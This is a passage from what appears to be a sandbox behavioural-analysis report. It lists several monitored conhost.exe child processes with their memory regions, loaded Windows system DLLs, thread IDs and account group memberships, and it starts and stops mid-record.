0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 138 os_tid = 0xf3c Thread: id = 183 os_tid = 0xc48 Thread: id = 241 os_tid = 0x10c8 Thread: id = 279 os_tid = 0x118c Process: id = "108" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xf8c2000" os_pid = "0xf40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "65" os_parent_pid = "0xddc" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2192 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2193 start_va = 0xd4a6100000 end_va = 0xd4a611ffff entry_point = 0x0 region_type = private name = "private_0x000000d4a6100000" filename = "" Region: id = 2194 start_va = 0xd4a6120000 end_va = 0xd4a6133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d4a6120000" filename = "" Region: id = 2195 start_va = 0xd4a6140000 end_va = 0xd4a617ffff entry_point = 0x0 region_type = private name = "private_0x000000d4a6140000" filename = "" Region: id = 2196 start_va = 0x7df5ffed0000 end_va = 0x7ff5ffecffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffed0000" filename = "" Region: id = 2197 start_va = 0x7ff6c4790000 end_va = 0x7ff6c47b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4790000" filename = "" Region: id = 2198 start_va = 0x7ff6c47b6000 end_va = 0x7ff6c47b6fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c47b6000" filename = "" Region: id = 2199 start_va = 0x7ff6c47be000 end_va = 0x7ff6c47bffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c47be000" filename = "" Region: id = 2200 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2201 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2202 start_va = 0xd4a6360000 end_va = 0xd4a645ffff entry_point = 0x0 region_type = private name = "private_0x000000d4a6360000" filename = "" Region: id = 2203 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2204 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3472 start_va = 0xd4a6100000 end_va = 0xd4a610ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d4a6100000" filename = "" Region: id = 3473 start_va = 0xd4a6110000 end_va = 0xd4a6116fff entry_point = 0x0 region_type = private name = "private_0x000000d4a6110000" filename = "" Region: id = 3474 start_va = 0xd4a6180000 end_va = 0xd4a623dfff entry_point = 0xd4a6180000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3475 start_va = 0xd4a6240000 end_va = 0xd4a627ffff entry_point = 0x0 region_type = private name = "private_0x000000d4a6240000" filename = "" Region: id = 3476 start_va = 0xd4a6280000 end_va = 0xd4a6280fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d4a6280000" filename = "" Region: id = 3477 start_va = 0xd4a6290000 end_va = 0xd4a6296fff entry_point = 0x0 region_type = private name = "private_0x000000d4a6290000" filename = "" Region: id = 3478 start_va = 0xd4a62a0000 end_va = 0xd4a62a0fff entry_point = 0x0 region_type = private name = "private_0x000000d4a62a0000" filename = "" Region: id = 3479 start_va = 0xd4a62b0000 end_va = 0xd4a62b0fff entry_point = 0x0 region_type = private name = "private_0x000000d4a62b0000" filename = "" Region: id = 3480 start_va = 0xd4a65e0000 end_va = 0xd4a65effff entry_point = 0x0 region_type = private name = "private_0x000000d4a65e0000" filename = "" Region: id = 3481 start_va = 0xd4a65f0000 end_va = 0xd4a6777fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d4a65f0000" filename = "" Region: id = 3482 start_va = 0xd4a6780000 end_va = 0xd4a6900fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d4a6780000" filename = "" Region: id = 3483 start_va = 0xd4a6910000 end_va = 0xd4a7d0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d4a6910000" filename = "" Region: id = 3484 start_va = 0x7ff6c4690000 end_va = 0x7ff6c478ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4690000" filename = "" Region: id = 3485 start_va = 0x7ff6c47bc000 end_va = 0x7ff6c47bdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c47bc000" filename = "" Region: id = 3486 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 3487 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3488 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3489 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3490 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3491 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3492 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3493 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3494 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3495 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3496 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3497 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4023 start_va = 0xd4a62c0000 end_va = 0xd4a62fffff entry_point = 0x0 region_type = private name = "private_0x000000d4a62c0000" filename = "" Region: id = 4024 start_va = 0xd4a6520000 end_va = 0xd4a652ffff entry_point = 0x0 region_type = private name = "private_0x000000d4a6520000" filename = "" Region: id = 4025 start_va = 0xd4a7d10000 end_va = 0xd4a7e26fff entry_point = 0x0 region_type = private name = "private_0x000000d4a7d10000" filename = "" Region: id = 4026 start_va = 0xd4a7e90000 end_va = 0xd4a7e9ffff entry_point = 0x0 region_type = private name = "private_0x000000d4a7e90000" filename = "" Region: id = 4027 start_va = 0xd4a7ea0000 end_va = 0xd4a81d6fff entry_point = 0xd4a7ea0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4028 start_va = 0xd4a81e0000 end_va = 0xd4a83f1fff entry_point = 0x0 region_type = private name = "private_0x000000d4a81e0000" filename = "" Region: id = 4029 start_va = 0xd4a8400000 end_va = 0xd4a8617fff entry_point = 0x0 region_type = private name = "private_0x000000d4a8400000" filename = "" Region: id = 4030 start_va = 0xd4a8620000 end_va = 0xd4a8833fff entry_point = 0x0 region_type = private name = "private_0x000000d4a8620000" filename = "" Region: id = 4031 start_va = 0xd4a8840000 end_va = 0xd4a8948fff entry_point = 0x0 region_type = private name = "private_0x000000d4a8840000" filename = "" Region: id = 4032 start_va = 0x7ff6c47ba000 end_va = 0x7ff6c47bbfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c47ba000" filename = "" Region: id = 4033 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4034 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4035 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4036 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4037 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4038 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4039 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4040 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4041 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 139 os_tid = 0xf44 Thread: id = 184 os_tid = 0xc40 Thread: id = 242 os_tid = 0x10cc Thread: id = 275 os_tid = 0x117c Process: id = "109" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xb3dc000" os_pid = "0xf48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "66" os_parent_pid = "0xde4" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2205 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2206 start_va = 0xa32b110000 end_va = 0xa32b12ffff entry_point = 0x0 region_type = private name = "private_0x000000a32b110000" filename = "" Region: id = 2207 start_va = 0xa32b130000 end_va = 0xa32b143fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a32b130000" filename = "" Region: id = 2208 start_va = 0xa32b150000 end_va = 0xa32b18ffff entry_point = 0x0 region_type = private name = "private_0x000000a32b150000" filename = "" Region: id = 2209 start_va = 0x7df5ff390000 end_va = 0x7ff5ff38ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff390000" filename = "" Region: id = 2210 start_va = 0x7ff6c44e0000 end_va = 0x7ff6c4502fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c44e0000" filename = "" Region: id = 2211 start_va = 0x7ff6c450d000 end_va = 0x7ff6c450efff entry_point = 0x0 region_type = private name = "private_0x00007ff6c450d000" filename = "" Region: id = 2212 start_va = 0x7ff6c450f000 end_va = 0x7ff6c450ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c450f000" filename = "" Region: id = 2213 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2214 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2215 start_va = 0xa32b240000 end_va = 0xa32b33ffff entry_point = 0x0 region_type = private name = "private_0x000000a32b240000" filename = "" Region: id = 2216 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2217 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2718 start_va = 0xa32b110000 end_va = 0xa32b11ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a32b110000" filename = "" Region: id = 2719 start_va = 0xa32b120000 end_va = 0xa32b126fff entry_point = 0x0 region_type = private name = "private_0x000000a32b120000" filename = "" Region: id = 2720 start_va = 0xa32b190000 end_va = 0xa32b1cffff entry_point = 0x0 region_type = private name = "private_0x000000a32b190000" filename = "" Region: id = 2721 start_va = 0xa32b1d0000 end_va = 0xa32b1d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a32b1d0000" filename = "" Region: id = 2722 start_va = 0xa32b1e0000 end_va = 0xa32b1e6fff entry_point = 0x0 region_type = private name = "private_0x000000a32b1e0000" filename = "" Region: id = 2723 start_va = 0xa32b1f0000 end_va = 0xa32b1f0fff entry_point = 0x0 region_type = private name = "private_0x000000a32b1f0000" filename = "" Region: id = 2724 start_va = 0xa32b200000 end_va = 0xa32b200fff entry_point = 0x0 region_type = private name = "private_0x000000a32b200000" filename = "" Region: id = 2725 start_va = 0xa32b340000 end_va = 0xa32b3fdfff entry_point = 0xa32b340000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2726 start_va = 0xa32b560000 end_va = 0xa32b56ffff entry_point = 0x0 region_type = private name = "private_0x000000a32b560000" filename = "" Region: id = 2727 start_va = 0xa32b570000 end_va = 0xa32b6f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a32b570000" filename = "" Region: id = 2728 start_va = 0xa32b700000 end_va = 0xa32b880fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a32b700000" filename = "" Region: id = 2729 start_va = 0xa32b890000 end_va = 0xa32cc8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a32b890000" filename = "" Region: id = 2730 start_va = 0x7ff6c43e0000 end_va = 0x7ff6c44dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c43e0000" filename = "" Region: id = 2731 start_va = 0x7ff6c450b000 end_va = 0x7ff6c450cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c450b000" filename = "" Region: id = 2732 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2733 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2734 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2735 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2736 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2737 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2738 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2739 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2740 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2741 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2742 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2743 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4682 start_va = 0xa32b400000 end_va = 0xa32b43ffff entry_point = 0x0 region_type = private name = "private_0x000000a32b400000" filename = "" Region: id = 4683 start_va = 0xa32b490000 end_va = 0xa32b49ffff entry_point = 0x0 region_type = private name = "private_0x000000a32b490000" filename = "" Region: id = 4684 start_va = 0xa32cc90000 end_va = 0xa32cda7fff entry_point = 0x0 region_type = private name = "private_0x000000a32cc90000" filename = "" Region: id = 4685 start_va = 0xa32ce00000 end_va = 0xa32ce0ffff entry_point = 0x0 region_type = private name = "private_0x000000a32ce00000" filename = "" Region: id = 4686 start_va = 0xa32ce10000 end_va = 0xa32d146fff entry_point = 0xa32ce10000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4687 start_va = 0xa32d150000 end_va = 0xa32d36cfff entry_point = 0x0 region_type = private name = "private_0x000000a32d150000" filename = "" Region: id = 4688 start_va = 0xa32d370000 end_va = 0xa32d582fff entry_point = 0x0 region_type = private name = "private_0x000000a32d370000" filename = "" Region: id = 4689 start_va = 0xa32d590000 end_va = 0xa32d7a1fff entry_point = 0x0 region_type = private name = "private_0x000000a32d590000" filename = "" Region: id = 4690 start_va = 0xa32d7b0000 end_va = 0xa32d8bbfff entry_point = 0x0 region_type = private name = "private_0x000000a32d7b0000" filename = "" Region: id = 4691 start_va = 0x7ff6c4509000 end_va = 0x7ff6c450afff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4509000" filename = "" Region: id = 4692 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4693 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4694 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4695 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4696 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4697 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4698 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4699 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4700 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 140 os_tid = 0xf4c Thread: id = 185 os_tid = 0xc20 Thread: id = 214 os_tid = 0x105c Thread: id = 307 os_tid = 0x11fc Process: id = "110" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xfa0f000" os_pid = "0xf50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "67" os_parent_pid = "0xdec" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2218 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2219 start_va = 0xb55c050000 end_va = 0xb55c06ffff entry_point = 0x0 region_type = private name = "private_0x000000b55c050000" filename = "" Region: id = 2220 start_va = 0xb55c070000 end_va = 0xb55c083fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b55c070000" filename = "" Region: id = 2221 start_va = 0xb55c090000 end_va = 0xb55c0cffff entry_point = 0x0 region_type = private name = "private_0x000000b55c090000" filename = "" Region: id = 2222 start_va = 0x7df5ff110000 end_va = 0x7ff5ff10ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff110000" filename = "" Region: id = 2223 start_va = 0x7ff6c40d0000 end_va = 0x7ff6c40f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c40d0000" filename = "" Region: id = 2224 start_va = 0x7ff6c40fd000 end_va = 0x7ff6c40fefff entry_point = 0x0 region_type = private name = "private_0x00007ff6c40fd000" filename = "" Region: id = 2225 start_va = 0x7ff6c40ff000 end_va = 0x7ff6c40fffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c40ff000" filename = "" Region: id = 2226 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2227 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2228 start_va = 0xb55c1a0000 end_va = 0xb55c29ffff entry_point = 0x0 region_type = private name = "private_0x000000b55c1a0000" filename = "" Region: id = 2229 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2230 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2666 start_va = 0xb55c050000 end_va = 0xb55c05ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b55c050000" filename = "" Region: id = 2667 start_va = 0xb55c060000 end_va = 0xb55c066fff entry_point = 0x0 region_type = private name = "private_0x000000b55c060000" filename = "" Region: id = 2668 start_va = 0xb55c0d0000 end_va = 0xb55c18dfff entry_point = 0xb55c0d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2669 start_va = 0xb55c190000 end_va = 0xb55c190fff entry_point = 0x0 region_type = 